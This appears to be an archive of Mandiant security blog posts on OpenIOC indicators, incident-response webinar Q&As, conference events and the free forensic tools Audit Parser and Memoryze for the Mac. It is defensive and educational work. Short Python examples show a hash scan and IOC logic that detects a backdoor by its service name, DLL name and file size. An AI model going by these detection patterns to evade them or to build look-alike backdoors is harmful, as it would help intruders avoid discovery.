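def scan(root):
    """Print any file whose MD5 appears in the bulk indicator list."""
    for path in Path(root).rglob("*"):
        if path.is_file() and md5_of(path) in KNOWN_BAD_MD5:
            print("MATCH: " + str(path))

scan(r"C:\Windows\Temp")  # illustrative starting point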

IOC components:

An IOC is made up of three main parts: IOC metadata, references and the definition. Let's examine each one of these more closely, noting that we're using the Mandiant IOC Editor (IOCe) downloadable from the Mandiant website:

Metadata: IOC metadata describes information like the author of the IOC (jsmith@domain.tld), the name of the IOC ("Evil.exe (BACKDOOR)") and a brief description such as "This variant of the open source Poison Ivy backdoor has been configured to beacon to 10.127.10.128 and registers itself as 'Microsoft 1atent time services'."

References: Within the IOC, references can hold information like the name of an investigation or case number, comments, and information on the maturity of the IOC such as Alpha, Beta, Release, etc. This data can help you understand where the IOC fits in your library of threat intelligence. One common use for references is to associate an IOC with a particular threat group. It is not uncommon for certain references to be removed from IOCs when sharing them with third parties.

Definition: This is the content of the IOC, containing the artifacts that an investigator decided to codify in the IOC. For example, these may include the MD5 of a file, a registry path or something found in process memory. Inside the definition, indicators are listed out or combined into expressions that consist of two terms and some form of Boolean logic.

One thing about the OpenIOC format that makes it particularly useful is the ability to combine similar terms using Boolean AND and OR logic. Consider an IOC whose definition describes three possible scenarios:

  1. The name of a service is "MS 1atent time services" - OR -
  2. The ServiceDLL name for any service contains "evil.exe" - OR -
  3. The filename is "bad.exe" AND the filesize attribute of that file is within the range 4096 to 10240 bytes.

When you use Boolean logic, remember the following:

  • An AND requires that both sides of the expression are true
  • An OR requires that one side of the expression is true

Understanding that Boolean statements such as 'the name of a service is "MS 1atent time services"' or 'the filename is "bad.exe" AND the filesize attribute of that file is within the range 4096 to 10240 bytes' are evaluated separately is an important aspect of understanding how the logic within an IOC works. These statements are not if-else statements, nor do both have to be true for the IOC to have a match. When investigating a host, if the "MS 1atent time services" service is present, this IOC would have a match, regardless of whether or not the malicious file the IOC described was present on the host as well.
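
To make the evaluation concrete, here is the same definition expressed as a single Python condition. This is only a sketch of the logic; it is not how tools actually process OpenIOC documents:

def ioc_hit(service_name, service_dll, file_name, file_size):
    # Three independent branches joined by OR, mirroring the scenarios above.
    return (
        service_name == "MS 1atent time services"
        or "evil.exe" in service_dll
        or (file_name == "bad.exe" and 4096 <= file_size <= 10240)
    )

# A host with only the malicious service still matches, even though no file
# named "bad.exe" is present:
print(ioc_hit("MS 1atent time services", "", "benign.exe", 123))  # True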

In our next post we're going to have a crash course in writing IOC definitions using the Mandiant IOC editor, IOCe. 

The History of OpenIOC

With the buzz in the security industry this year about sharing threat intelligence, it's easy to get caught up in the hype and believe that proper, effective sharing of indicators or intelligence is something that can just be purchased along with goods or services from any security vendor.

It's really a much more complex problem than most make it out to be, and one that we've been working on for a while. A large part of our solution for managing Threat Indicators is using the OpenIOC standard format.

Since its founding, Mandiant has sought to solve the problem of how to conduct leading-edge Incident Response (IR) - and how to scale that response to an entire enterprise. We created OpenIOC as an early step in tackling that problem. Mandiant released OpenIOC to the public as an Open Source project under the Apache 2 license in November of 2011, but OpenIOC had been used internally at Mandiant for several years prior.

IR is a discipline that usually requires highly trained professionals doing very resource-intensive work. Traditionally, these professionals would engage in time-intensive investigations on only a few hosts on a compromised network. Practical limitations on staffing, resources, time, and money would prevent investigations from covering anything other than a very small percentage of most enterprises. Responders would only be able to examine what they had direct access to, with their corresponding conclusions constrained by time and budget.

This level of investigation was almost never enough to give confidence on anything other than the hosts that had been examined - responders were unable to confirm whether other systems were still compromised, or whether the adversary still had footholds in other parts of the network.

Creating a standard way of recording Threat Intelligence into an Indicator was part of what allowed Mandiant to bring a new approach to IR, including the use of an automated solution, such as Mandiant for Intelligent Response® (MIR®). Mandiant's new strategy for IR enabled investigators, who previously could only get to a few hosts in an engagement, to now query entire enterprises in only slightly more time. Using OpenIOC as a standardized format, the Indicators of Compromise (IOCs) were recorded once, and then used to help gather the same information and conduct the same testing on every host across the enterprise via the automated solution. Incident Responders could now spend only a little more time, but cover an exponentially larger number of hosts during the course of an investigation.

Recording the IOCs in OpenIOC had other benefits as well. Indicators from one investigation could be shared with other investigations or organizations, and allow investigators to look for the exact same IOCs wherever they were, without having to worry about translation problems associated with ambiguous formats, such as lists or text documents. One investigator could create an IOC, and then share it with others, who could put that same IOC into their investigative system and look for the same evil as the first person, with little to no additional work.

The format grew organically over time. We always intended that the format be expandable and improvable. Instead of trying to map out every possible use case, Mandiant has updated the format and expanded the dictionaries of IOC Terms as new needs have arisen over time. The version we released in 2011 as "1.0" had already been revised and improved upon internally several times before its Open Source debut. We continue to update the standard as needed, allowing for features and requests that we have received over time from other users or interested parties.

Unlike traditional "signatures," OpenIOC provides the ability to use logical comparison of Indicators in an IOC, providing more flexibility and discrimination than simple lists of artifacts. An extensive library of Indicator Terms allows for a variety of information from hosts and networks to be recorded, and if something is not covered in the existing terms, additional terms may be added. Upcoming features like parameters will allow for further expansion of the standard, including customization for application or organization specific use cases.

Having the OpenIOC standard in place is tremendously powerful, providing benefits for scaling detection and investigation, both of which are key parts of managing the threat lifecycle. OpenIOC enables easy, standardized information sharing once implemented, without adding much to workloads or draining resources. And it is freely available as Open Source, so that others can benefit from some of the methods we have already found to work well in our practice. We hope that as we improve it, you can take even more advantage of what OpenIOC has to offer in your IR and Threat Intelligence workflows.

Next up in the Back to Basics: OpenIOC series, we'll talk about some of the basics of what OpenIOC is and what using it involves - and some of the upcoming things in the future of OpenIOC.

Back to Basics Series: OpenIOC

Over the next few months, a few of my colleagues and I will be touching on various topics related to Mandiant and computer security. As part of this series, we are going to be talking about OpenIOC - how we got where we are today, how to make and use IOCs, and the future of OpenIOC. This topic can't be rolled into a single blog post, so we have developed a brief syllabus to outline the topics that we will be covering in the near future.

The History of OpenIOC

In this post we're going to focus on the past state of threat intelligence sharing and how it has evolved up to this point in the industry. We'll specifically focus on how we implemented OpenIOC at Mandiant as a way to codify threat intelligence.

Back to the Basics

What are indicators of compromise? What is an OpenIOC? What goes into an IOC? How do you read these things? What can you include in them? We will address all of these questions and more.

Investigating with Indicators of Compromise (IOCs)

In this post, we will model an actual incident response and walk through the creation of IOCs to detect malware (and attacker activity) related to the incident presented. Multiple blog posts and IOCs will come out of this exercise.

IOCs at Scale

So far, we will have touched on using Redline™ to deploy OpenIOC when investigating a single host. To deploy IOCs across an enterprise, we use Mandiant for Intelligent Response® (MIR®). Briefly, we will show how we can use MIR to deploy the IOCs built in the previous exercise across an enterprise scenario, expediting the incident response process.

The Future of OpenIOC

What is next? OpenIOC was open sourced in the fall of 2011, and it is time for an upgrade! With the soft-launch of the draft OpenIOC 1.1 spec at Black Hat USA, we've since released a draft of the OpenIOC 1.1 schema. We'll discuss what we changed and why, as well as some of the exciting possibilities that this update makes possible.

Integrating OpenIOC 1.1 into tools

With the release of the OpenIOC 1.1 draft, we also released a tool, ioc_writer, which can be used to create or modify OpenIOC 1.1 IOCs. We will detail the capabilities of this library and how you could use it to add OpenIOC support to your own applications. We will also discuss the potential for using parameters to further define application behavior that is not built into the OpenIOC schema itself.

We have several goals for this series:

  • Introduce OpenIOC for people that are not already familiar with OpenIOC
  • Show how you can use OpenIOC to record artifacts identified during an investigation
  • Show how OpenIOC can be deployed to investigate a single host - or a whole enterprise
  • Discuss the future of OpenIOC & the upcoming specification, OpenIOC 1.1
  • Show how OpenIOC 1.1 support can be added to tools, and future capabilities of the standard

Stay tuned for our next post in the series!

Mandiant @ Black Hat USA 2013

In just a few short weeks we'll be boarding a flight to Las Vegas, NV for Black Hat USA 2013. In addition to clothes and toiletries, I want to make sure you go to the annual conference with a full list of Mandiant's activities at the show.

Black Hat Exhibitor Floor:

  • Visit Mandiant at booth #325
  • Pick-up a t-shirt and talk to some Mandiant folks

 

Reception:

Join Mandiant for an unforgettable evening at the famed Shadow Bar in Caesars Palace. The evening will showcase silhouetted performances by the shadow dancers, and libations will be served up by the venue's world-class bartenders, who are known to juggle bottles, toss limes, twirl glasses and even do back-flips.

Books & Beer Signing:

  • Richard Bejtlich: "The Practice of Network Security Monitoring"
    Wednesday, July 31
    4:30 - 5:00 PM
    M Lair: Verona Room, The Promenade Level

Book signing with Richard Bejtlich for his new release, "The Practice of Network Security Monitoring", and happy hour. The first five people in line for the book signing will win an invitation to a very special VIP dinner with Richard Bejtlich and Michael Sikorski, and will receive a free copy of their books. The first 30 people in line receive a FREE copy of Richard's book!

  • Michael Sikorski: "Practical Malware Analysis"
    Thursday, Aug 1
    4:30 - 5:00 PM
    M Lair: Verona Room, The Promenade Level

Book signing with Michael Sikorski for his 2012 release, "Practical Malware Analysis", and happy hour. The first 30 people in line receive a FREE copy of Michael's book!

A Day in the Life Presentations

  • Mandiant Labs (M-Labs)
    Wednesday, July 31
    12:45-1:30 PM

Mandiant's Michael Sikorski and Stephen Davis will walk attendees through a typical day for a malware analyst and how they have successfully integrated machine learning into their research.

  • Mandiant MCIRT Analysts
    Thursday, August 1
    12:45 - 1:30 PM

Mandiant's James Condon and Mike Scutt will walk attendees through a typical day as an MCIRT Analyst, using an attack scenario to highlight the tools and processes used by MCIRT Analysts to successfully investigate a compromise.

Arsenal:

  • IOCWriter_11
    Presented by William (Will) Gibb
    Thursday, August 1
    10:00 AM - 12:30 PM
    Station 7

With the impending release of the OpenIOC 1.1 format for sharing threat intelligence, Mandiant will be releasing a set of open source tools for creating and manipulating OpenIOC objects and moving data in and out of the OpenIOC format.

Demonstrations will cover how the tools can be used to create and modify OpenIOC documents, show how it is possible to store Snort and Yara signatures in OpenIOC format and convert those OpenIOC documents back into their native formats. In addition, the integration of these tools into other open source applications will be demonstrated with tools that can automatically extract IOCs from unstructured content.

  • Mandiant Redline™
    Presented by Theodore (Ted) Wilson
    Thursday, August 1
    12:45 - 3:15 PM
    Station 7

Redline, Mandiant's premier free tool, provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis, and the development of a threat assessment profile. With Redline, users can:

- Thoroughly audit and collect all running processes, audit data, and memory images.

- Analyze and view imported audit data, including narrowing and filtering results around a given timeframe using Redline's Timeline functionality with the TimeWrinkle™ and TimeCrunch™ features.

- Streamline memory analysis with a proven workflow for analyzing malware based on relative priority.

- Identify processes more likely worth investigating based on the Redline Malware Risk Index (MRI) score.

- Perform Indicator of Compromise (IOC) analysis. Supplied with a set of IOCs, the Redline Portable Agent is automatically configured to gather the data required to perform the IOC analysis and an IOC hit result review.

  • OWASP Broken Web
    Presented by Chuck Willis
    Thursday, August 1
    12:45 - 3:15 PM
    Station 8

The Open Web Application Security Project (OWASP) Broken Web Applications project (www.owaspbwa.org) provides a free and open source virtual machine loaded with web applications containing security vulnerabilities. This session will showcase the project VM and exhibit how it can be used for training, testing, and experimentation by people in a variety of roles.

Demonstrations will cover how the project can be used by penetration testers who discover and exploit web application vulnerabilities, by developers and others who prevent and defend against web application attacks, and by individuals who respond to web application incidents. New features and applications in the recently released version 1.1 of the VM will also be highlighted.

Let us know if you'll be at Black Hat USA 2013!

Q&A Webinar Follow-Up – State of the Hack: Back to the Remediation

As a follow-up to our recently held State of the Hack: Back to the Remediation webinar, questions answered by presenter Jim Aldridge are listed below. 

  1. How do you develop a business case for resources for security incident management, remediation, and log analysis?
    This is an area that many organizations that have not experienced an incident struggle with. I would recommend conducting a realistic incident simulation to exercise the organization's incident response plan. This should go beyond a table-top exercise and actually test responders' capabilities to use logs to identify and track attacker activity. This approach should provide the organization a good understanding of weaknesses in these areas. For example, I assisted a bank with planning and executing this type of exercise. They were concerned about targeted threats and had never experienced a security breach. After a series of meetings to better understand their environment, we designed a scenario based on an incident we had worked on in the past. In their scenario, picture a blank screen with a SQL Server and a question mark on it. We would give them a clue, and then we would go on and say, "Okay, so what would you do if you got this information?" And then we provided a little bit more of the diagram. It was in the style of a choose-your-own-adventure.
  2. During incident response what tools do you use for networking indicators; are any of them open source?
    Typically, we like to deploy our network sensors, which we don't offer as a standalone product at this time. That intelligence is only available as part of our Managed Defense™ service, in large part due to the back end processing that's involved. I would categorize those as proprietary. They do a lot for us, but we also leverage whatever the client has in place.
    Sources of helpful information include:
    • Firewall logs (established connection information)
    • DNS logs (which host resolved a given domain name at a given time)
    • NetFlow (connection information)

    One of the more mature security organizations that I've worked an incident with has a particularly effective network monitoring setup. They collect NetFlow information from across the environment. This enables them to rapidly identify lateral movement.

  3. Is the Mandiant incident response tool available to the public?
    Mandiant for Intelligent Response® is a commercial product. As I mentioned, Redline™ is a free tool that I encourage you to take a look at. It is very similar to MIR in terms of the capabilities on individual hosts, but it's designed to be executed against one host versus an enterprise.
  4. What are your thoughts on best countermeasures against pass-the-hash tactics?
    It is most important to prevent the attacker from getting access to that hash in the first place. That's one reason why I like application whitelisting so much, particularly on domain controllers, because this can prevent even a domain admin from running the hash dumper. Unfortunately, once the attacker has that hash, it's not good. Another strategy is to reduce the number of places where an attacker could readily obtain privileged users' hashes. First, privileged users should operate with non-privileged accounts for their day-to-day activities. This helps reduce the impact of a spear phishing email or strategic web compromise that impacts that user. To conduct administration activities, connect to a jump server using two-factor authentication. Maybe incorporate a password vault so that the vault connects the user to the jump server, after a two-factor authentication process, and the password is never divulged to the user (or present on the admin's PC). Then lock down the jump server with application whitelisting, implement enhanced logging and monitoring. Configure firewalls and systems to only accept inbound connections on administrative services from the jump servers and not from the network at large. Each of these countermeasures helps to mitigate a part of the attack lifecycle; implementing them together can help greatly strengthen the security posture.
  5. What kind of back door were the attackers using on the first infected systems?
    That varies widely. In some cases I worked recently, we've seen Gh0st RAT, we've seen Poison Ivy, and we've seen a custom back door that doesn't really have a name because it's something that this one particular group uses. The particular tool wasn't the point, just more the fact that they were infected. We're seeing a lot more use of publicly available back doors. They can be pretty effective, and can also be hard to detect.
  6. How would one ever determine the true scope of a foothold in a global environment if it's using multiple command and control points?
    To answer that question, you have to start by comprehensively surveying the environment for indicators of compromise (IOCs). You start by taking the pieces of information you know, e.g., the backdoors the attacker is known to use, known compromised accounts, and command-and-control IP addresses. Perhaps this yields two systems that are initially suspected of being compromised. You then ask the question, "Well, where did they go from those two systems? How did they get on those two systems?" You conduct forensic analysis to understand all the facts related to those systems: how did they gain access, what did they do, where did they go, and what tools did they use. Then you follow those threads, identifying more systems. This can be challenging in a large environment, which is one of the really helpful use cases for Mandiant for Intelligent Response. The largest organization where I have conducted this type of incident response had around 135,000 hosts. With a team of five or six people and about eight weeks, we could get a handle on that environment.
  7. How do we balance the need to contain and respond and the need to preserve forensic evidence?
    It depends on whether you think the matter is likely to go to court or into litigation. You want to make sure that your procedures are as minimally intrusive as possible, but typically in most APT-type cases, we don't worry as much about formal chain of custody for systems or preserving every system in its original state. The way I would look at it is, I would develop a set of procedures for your organization that covers how you determine when you need to preserve evidence, what that means, and what your standard operating procedures are, so that you can both explain what you're doing and minimize the impact on systems.

Q&A Follow-up – Tools of Engagement: The Mechanics of Threat Intelligence

As a follow-up to our recently held Tools of Engagement - The Mechanics of Threat Intelligence: Analysis, Information Sharing and Associated Challenges webinar, questions answered by presenters Doug Wilson and Jen Weedon are listed below. To view the archived webinar, please click here.

1. We received some questions asking about work being done by Mandiant and others on open source intelligence sharing. We've got some questions about STIX and TAXII in comparison to other frameworks.

To succeed with sharing indicators internally or externally, you have to pick a standardized format. That can be anything, honestly, from a tab-delimited file to complicated XML. If you are looking at sharing outside your organization, there are a couple of different standards that are out there to look at.

OpenIOC is what Mandiant uses for recording and transmitting threat indicators. DHS funds a project through MITRE called STIX, with a transport and exchange mechanism that is called TAXII. IETF also has the MILE working group, which has a protocol named IODEF, which uses RID as its transfer and exchange mechanism. These are all ways of packaging up threat information and shipping them off to other people or organizations. We've been looking at interacting with both groups, and trying to make sure that OpenIOC interacts with both sets of protocols where it can.

A lot of people are still very uncomfortable with the idea of sharing openly, so a lot of the sharing that's happening out there is going to be happening in smaller, closed groups.

The protocols that we have discussed are all open standards, whether somebody is sharing in a small group or a large group. Since they are all open and freely available, there are no restrictions on using them for sharing. We're hoping that there are some corporations out there that are standing up sharing portals - there are also government entities doing this as well. We're hoping that, ultimately, people will be able to pick the tools that work properly for their particular situation. But whatever standard (or standards) shakes out as being the one most people use, it will need to be something that's open and accessible.

There were several questions about sharing groups. If you're not familiar with the idea of an ISAC, I suggest looking them up online. ISAC stands for Information Sharing and Analysis Center. There's an ISAC Council website that lists a number of the ISACs (not endorsed by Mandiant, but for reference: http://www.isaccouncil.org/memberisacs.html). Some of the larger ISACs have their own events and conferences; FS-ISAC is one that is engaged in adopting threat information sharing standards (such as STIX).

There are also specific groups for the Defense Industrial Base, or DIB. Associated with the DoD Cybercrime Center (DC3) is the DoD-DIB Collaborative Information Sharing Environment (DCISE).

2. As an investment bank, how should we advise our clients concerning cyber security audit and compliance prior to making an acquisition?

We have seen threat activity around or related to acquisitions and mergers. Entities should be aware that advanced attackers are often quite aware of business decisions and movements in industries that they're targeting, so you should take this into account when determining how you want to allocate resources for risk management.

We can't directly advise any specific course of action, and folks should consult their counsel or their risk management personnel on specific actions, but on numerous occasions we have been asked to do investigations that center around acquisitions and mergers. We often advise our clients to consider doing threat assessments as part of the due diligence process when they are thinking of acquiring other companies. In addition, we conduct regular analysis on risk factors for companies who may be targeted by advanced threat actors to identify which variables may place them at higher likelihood of being targeted, and why. These variables may include the industry they're in, their intellectual property, strategic partnerships, business strategy, and overseas operations.

3. What are the options - in other words, legal or technical - available to counterattack hackers from world nations who don't respect international laws?

Mandiant does not endorse or support hacking back in any form. We suggest an in-depth incident response life cycle within your organization's network and hosts, and an ongoing cycle of detection, response and containment. We also suggest reaching out to law enforcement or the appropriate authorities responsible for national security.

4. What are the most important items to gather and share with a threat team for vulnerability analyses?

An accurate depiction of vulnerabilities in an enterprise can help inform risk management decisions. This should be a two-way communication. A team that deals with threats can prioritize responding to some threats above others if they know certain vulnerabilities or weaknesses exist within their environment. In turn, the threat team can talk with whoever does the vulnerability assessment if they think certain types of actors are more likely to exploit certain types of vulnerabilities, so those vulnerabilities get a higher priority for remediation.

5. What kind of training do you suggest for intelligence analysis, especially cyber threat intelligence analysis?

One of the most important things a company, or anyone doing threat intel in an office, can do is to get the technical folks and the more traditional intel analysts in the room together to observe how the other side works.

It may not be possible to fully cross-train both types of personnel on each other's disciplines, but the more interaction they have and the more folks get out of their comfort zones, the better your teams will understand each other. Communication is key, especially when technical and non-technical teams have to work together.

6. Strategic versus tactical - why would individual firms care beyond what protects them from immediate threats? In other words, why would they care about strategic over the tactical?

This gets into debates about attribution, categorization of threats and threat tracking, and why that matters, which is a large topic in and of itself. It really depends on where an organization is in terms of the maturity of its security capabilities.

If an organization's security interests are strictly operational, and it is just looking at turning stuff away at the firewall and blocking things, the idea of a longer-term view of threat actors is not going to be interesting, because it is just looking for what can immediately stop the bleeding. As an organization becomes more mature in its security posture and starts basing security on threat intelligence, it will be able to appreciate the use of strategic intelligence. But this requires an investment of a lot more resources, and investment in personnel and programs that are not yet considered standard for traditional "information security".

7. Is threat intelligence a myth?

Again, this depends a lot on the maturity level that a security program is at. It's not a myth, but it might be useless to entities that do not have the resources or focus to do anything with threat intelligence.

We've seen that attribution is one area where people can go down a lot of rabbit holes. Some folks spend a lot of time arguing about the merit of attribution, and can get wrapped around the fact that attribution down to a specific human being is nearly impossible on the Internet. It doesn't necessarily matter who is at the keyboard unless you're a nation state or somebody who's going to be pursuing an international lawsuit against a particular person.

But the groups of actors, and what is motivating these groups to make them want to act against your enterprise, should be of interest to you. If you want to be proactive about securing your network and distributing resources to protect your network, it helps to know that someone is using a particular type of attack and they're not using another set of attacks. This may help you determine how to allocate resources for defense.

If you have fewer resources, a less mature security posture, or you're not as far along in the life cycle of getting a sophisticated security program set up - and a lot of people are having a hard time getting down that road because of the classic problems of justifying your budget or convincing your CEO to care - you're not necessarily going to care about a strategic view of threat actors.

But if you're someone who has invested more in security, and you're spending money on a defense informed by a strategic viewpoint, it's going to matter a lot more, and we're seeing a lot more major companies turning in this direction over time. So there may be naysayers, but the market is slowly speaking out against them.

8. What are some resources for analysts and detailed methodologies and curriculums as well as buying threat intelligence and reviews on different products and services?

Without going into specifics on the latter question, there are certainly a lot of industry research organizations that have racked and stacked different threat intelligence providers and their solutions.

I guess it really gets to what you can consume. Like Doug was saying, if you have the resources and the political will inside your organization to consume more strategic intelligence, you may have different needs and pursue different solutions providers.

In terms of developing a threat intel capability, there are certainly lots of firms out there, including Mandiant, who consult on what you need to do to mature in that sense.

9. Are there public or closed IOC sharing platforms besides ioc.forensicartifacts.com?

A couple of other entities out there are using OpenIOC publicly. If you are familiar with the company AlienVault, their labs team will include an IOC as part of its sharing when posting threat information and blog posts about malware.

We also do that with some of our blog posts and forum posts. Some of those are open and some of those closed to our customers, depending on the level of content. There, unfortunately, is not a wonderful public open sharing site for all of the IOCs out there other than http://ioc.forensicartifacts.com.

Most people are still kind of uncomfortable with the idea of sharing openly, so you're going to see closed communities springing up here and there and, over time, they're going to open up or improve or share with larger audiences. We hope to continue to contribute to that conversation as it evolves.

10. What are the sources of IOCs?

IOCs can come from a variety of sources. In Mandiant's case, they are a product of a wide variety of different sets of input throughout our business units, curated over time by our intel team. We capture IOCs from our investigative work, from feedback from our product and managed services customers, and from a wide variety of intel sources, including examining malware and network traffic. Organizations could create IOCs from their own knowledge of threats that they face, but usually they use a combination of their knowledge plus information gleaned from other security or intelligence sources.

11. What kind of IOC would you recommend sharing publicly or just in closed groups, so attackers don't know detection methods?

IOCs don't necessarily give away detection methods. Specific pieces of intelligence may give away sources and methods, and you need to determine risk to your intel sources before sharing anything. However, in most cases, especially if you are already trying to combat an opponent that has launched attacks against your networks, they probably assume that you can capture anything that they may deploy against you. If you are using external sources of intelligence, the situation becomes more complex, which is where having trained intelligence staff and experienced analysts can help you make appropriate decisions. The risk tolerance of each organization is going to be different, so it will likely be something that you will have to tailor to your organization's limits.

12. What are some products that can be used for capturing/managing intelligence?

We have previously discussed the use of threat intel in the form of IOCs. The freely available Mandiant IOC Editor can be used to write and edit IOCs, and Redline can consume IOCs for host based investigations. Both of these complement the commercial Mandiant for Intelligent Response® offering.

Mandiant IOC Editor

Redline

Additionally, during the webinar we were also asked about tools for gathering and cataloging more strategic intelligence. None of these are endorsed by Mandiant. However, some examples of tools to consider are:

Splunk http://www.splunk.com/

Palantir http://www.palantir.com/what-we-do/

Lynxeon http://www.21ct.com/products/lynxeon/

13. Do domains and IPs alone attribute activity to an actor if the actor was seen using a domain or an IP once?

Attribution to actors is a complicated and time-consuming process. Actors' use of certain domains or IPs as part of their attack infrastructure is only part of the story. Threat groups also frequently share infrastructure, malware, or other tools. There's certainly no 1:1 correspondence between IPs and domains and specific actors, especially if you've only observed the correlation once. They're useful data points for more thorough analysis.

New Open Source Tool: Audit Parser

Mandiant Redline™ and IOC Finder™ collect and parse a huge body of evidence from a running system. In fact, they're based on the same agent software as our flagship Mandiant for Intelligent Response® product. During the course of their "audits", these tools conduct comprehensive analysis of the file system (including hashing, time stamps, parsing of PE file structures, and digital signature checks), registry hives, processes in memory, event logs, active network connections, DNS cache contents, web browser history, system restore points, scheduled tasks, prefetch entries, persistence mechanisms, and much more.

Once this data is collected, Redline and IOC Finder currently allow you to do one of two things:

  • Review the contents of memory through a visual workflow in Redline
  • Search for Indicators of Compromise (IOCs) and generate a report of "hits"

But what if you want to analyze all of the raw evidence - not just memory or IOC hits - and do traditional forensics and timeline analysis? That's where Audit Parser steps in. It's the newest addition to Mandiant's portfolio of free software.

Audit Parser is simple: it takes the complex XML data produced by Redline or IOC Finder and converts it into human-readable tab-delimited text. You can then easily review the output in Excel, use a dedicated CSV file viewer (we're fans of "CSVed" and "CSVFileView"), import it into a database, or grep / manipulate it to your heart's content.
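
Conceptually, the conversion looks something like the toy Python sketch below, which flattens file-audit items into tab-delimited rows. The element names ("FileItem", "FullPath", "Md5sum", "SizeInBytes") and the file name are illustrative assumptions about the audit schema; the real audits carry far more fields, which is exactly the drudgery Audit Parser handles for you:

from lxml import etree

def audit_to_tsv(xml_path, fields=("FullPath", "Md5sum", "SizeInBytes")):
    """Flatten each FileItem element of an audit into one tab-delimited row."""
    tree = etree.parse(xml_path)
    print("\t".join(fields))
    for item in tree.iter("FileItem"):
        print("\t".join(item.findtext(field, default="") for field in fields))

audit_to_tsv("w32files.xml")  # hypothetical audit file name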

When paired with Redline's new start-up workflow to build a "collector" script, Audit Parser gives you a complete (and free) live response analysis toolkit. You can customize the Redline collector to gather as much or as little evidence as desired, run it on your target system, and then easily review all of the results following a quick conversion with Audit Parser.

The screen capture below shows Audit Parser's options - it's pretty straightforward to use:

Tabular data in Excel doesn't make for the most exciting screen shots, but we wanted to give you a glimpse into what the output looks like and the extent of evidence available for filtering, sorting, and analysis:

  • A filtered view of a file system audit, showing complete file metadata for all PE files within %SYSTEMROOT% created between 2011 and 2012 that are not digitally signed.

  • A portion of a prefetch audit, showing how the contents of .PF files are automatically parsed to provide last time executed, # of times executed, and original file path metadata.

  • A portion of a full registry dump, showing review of Active Setup Installed Components registry keys - the data includes all key value / data pairs and last modified dates.

  • A portion of the parsed Windows event logs, showing review of process auditing events including event log source, time generated, event ID, and full event message contents.

The default "comprehensive collector" script in Redline collects all of the artifacts listed above, as well as many more.

But wait - that's not all! Audit Parser also contains timeline generation functionality. Just specify a time & date range, and it will build a sorted timeline of all file system, registry, and event log events that occurred within that period. Future releases will add more audit types and customizability to this feature.
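
In spirit, the timeline feature boils down to merging timestamped records from the parsed audits, filtering them to a window, and sorting. A hedged sketch follows; the sample events echo the investigation described earlier in this archive, and ISO-8601 timestamps are used because they sort correctly as plain text:

def build_timeline(events, start, end):
    """events: iterable of (timestamp, source, detail) tuples."""
    return sorted(e for e in events if start <= e[0] <= end)

events = [
    ("2013-10-15T16:17:55Z", "registry", "Mounted \\\\10.20.30.101\\C$"),
    ("2013-10-11T20:24:00Z", "prefetch", "IPCONFIG.EXE executed"),
    ("2013-10-15T17:37:37Z", "filesystem", "a.rar created"),
]
for stamp, source, detail in build_timeline(events, "2013-10-01", "2013-11-01"):
    print(stamp, source, detail)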

Audit Parser is written in Python and is distributed under the Apache License. It requires the lxml (http://lxml.de/) library. We're also distributing a Windows EXE built with Py2EXE for users that may not have a Python environment set up. You can download the tool and documentation on GitHub at: https://github.com/mandiant/AuditParser

If you have any questions or comments, feel free to leave them below, e-mail me (ryan [dot] kazanciyan [at] mandiant.com), or DM me on Twitter at @ryankaz42. I'll also be at Black Hat USA next week teaching Mandiant's Incident Response course where we'll be going through an in-depth live response analysis lab using Redline, Audit Parser, and other forensic tools. I was on a recent M-Unition podcast discussing the class and how it is completely revamped for 2012. You can listen to the podcast here. Hope to see you there!

Unibody Memory Analysis — Introducing Memoryze™ for the Mac 1.0

Today, Mandiant is introducing a new free tool, Memoryze™ for the Mac 1.0, which brings memory imaging and analysis to the Mac. It joins a growing list of freeware tools Mandiant currently provides.

Memoryze™ for the Mac 1.0 brings many of the features of Memoryze to the Apple Macintosh platform. This new tool enables acquisition of memory images via the command-line or a simple GUI. In addition, Memoryze™ for the Mac 1.0 can perform offline analysis against memory images or live analysis on a running system.

The tool supports the following features:

  • Imaging the full range of system memory
  • Acquiring individual processes' memory regions
  • Enumerating all running processes
    • Including those hidden by rootkits

For each process, Memoryze™ for the Mac 1.0 can:

  • Report all open file handles in a process (e.g., files, sockets, pipes, etc.)
  • List the virtual address space of a process, including loaded libraries and allocated portions of the heap and execution stack
  • List network connections
    • Active and listening
  • Enumerate
    • All loaded kernel extensions including those hidden by rootkits
    • The System Call Table and Mach Trap Table
    • All running Mach Tasks

Okay, enough of the marketing. Memoryze™ for the Mac 1.0 can be downloaded here. To help get you started we'll present a few of the features in this blog post.

For offline analysis your first step is going to be acquiring memory. The Mac Memory Dumper App makes this process as simple as pushing a button. To begin the acquisition, Memoryze™ for the Mac 1.0 will require you to authenticate so that the application can load a memory dumping driver. After selecting the location to store the image and authenticating, Memoryze™ for the Mac 1.0 will begin the acquisition process. The tool will provide you with a progress bar and an image size monitor for each of your acquisitions (fancy, huh?).

Note that the final size of the dumped image may exceed the size of your physical RAM. If the system has 8GB of physical RAM installed, the dump may be 10GB. You may ask yourself, "Self, why is the dumped image bigger than my actual memory size?" There are regions that are physically addressable but are not part of actual DRAM: pesky memory-mapped devices. These regions are written to the image file as 0x0-bytes to help preserve the correct offsets within the image.

Once Memoryze™ for the Mac 1.0 finishes the acquisition, we can use it to perform memory analysis (note that Memoryze™ for the Mac 1.0 can also perform analysis on images acquired by other tools). With our data ready, let's run through several of the process analysis features we mentioned above.

We'll start by performing a basic process listing based on the memory image we just created. Execute the command below:

macmemoryze proclist -f ~/Documents/my.mem 2>err.txt

Memoryze™ for the Mac 1.0 will open "my.mem" for analysis and detect two critical pieces of information about the image: the operating system version and whether the system is running a 32- or 64-bit kernel. Armed with this information, the proclist analysis module locates the operating system data structure that maintains the list of running processes.

If you take a look at the output below, you can see that Memoryze™ for the Mac 1.0 extracts the PADDR, or physical address, of each process (this is also the offset of the process in the acquired memory image file). You can use the PADDR to quickly locate the process in question in an offline tool such as a hex editor. Memoryze™ for the Mac 1.0 also extracts other standard identifying information such as the process NAME, PID and parent PID (PPID). In addition, the tool provides the start time for each process in UTC. Finally, Memoryze™ for the Mac 1.0 extracts each process' associated USERNAME, effective userid (EUID), and real userid (RUID).
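
Because the PADDR doubles as a file offset into the acquired image, you can inspect the raw bytes directly. A minimal Python sketch, where the image path and offset are illustrative rather than real output:

def peek(image_path, paddr, length=64):
    """Read a few raw bytes at a physical address within an acquired image."""
    with open(image_path, "rb") as image:
        image.seek(paddr)
        return image.read(length)

print(peek("my.mem", 0x01A3B000).hex())  # substitute a PADDR from proclist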

